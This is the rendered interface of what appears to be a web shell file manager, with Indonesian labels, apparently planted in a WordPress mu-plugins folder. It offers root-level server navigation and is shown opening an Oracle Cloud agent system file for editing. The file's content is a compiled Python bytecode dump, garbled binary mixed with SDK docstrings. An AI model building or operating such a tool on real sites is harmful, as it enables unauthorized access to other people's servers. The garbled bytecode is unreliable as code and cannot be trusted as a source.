📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
mysql
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/mysql/models
💾
Free:
45.7 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: update_analytics_cluster_details.pyc
a O��f� � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ sd e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zd d� Z dd � Z dd� ZdS )�UpdateAnalyticsClusterDetailszz DEPRECATED -- please use HeatWave API instead. Details about the Analytics Cluster properties to be updated. c K s( ddd�| _ ddd�| _d| _d| _dS )a Initializes a new UpdateAnalyticsClusterDetails object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param shape_name: The value to assign to the shape_name property of this UpdateAnalyticsClusterDetails. :type shape_name: str :param cluster_size: The value to assign to the cluster_size property of this UpdateAnalyticsClusterDetails. :type cluster_size: int �str�int)� shape_name�cluster_size� shapeName�clusterSizeN)� swagger_types� attribute_map�_shape_name� _cluster_size)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/mysql/models/update_analytics_cluster_details.py�__init__ s ��z&UpdateAnalyticsClusterDetails.__init__c C s | j S )a� Gets the shape_name of this UpdateAnalyticsClusterDetails. A change to the shape of the nodes in the Analytics Cluster will result in the entire cluster being torn down and re-created with Compute instances of the new Shape. This may result in significant downtime for the analytics capability while the Analytics Cluster is re-provisioned. :return: The shape_name of this UpdateAnalyticsClusterDetails. :rtype: str �r �r r r r r , s z(UpdateAnalyticsClusterDetails.shape_namec C s || _ dS )a� Sets the shape_name of this UpdateAnalyticsClusterDetails. A change to the shape of the nodes in the Analytics Cluster will result in the entire cluster being torn down and re-created with Compute instances of the new Shape. This may result in significant downtime for the analytics capability while the Analytics Cluster is re-provisioned. :param shape_name: The shape_name of this UpdateAnalyticsClusterDetails. :type: str Nr )r r r r r r <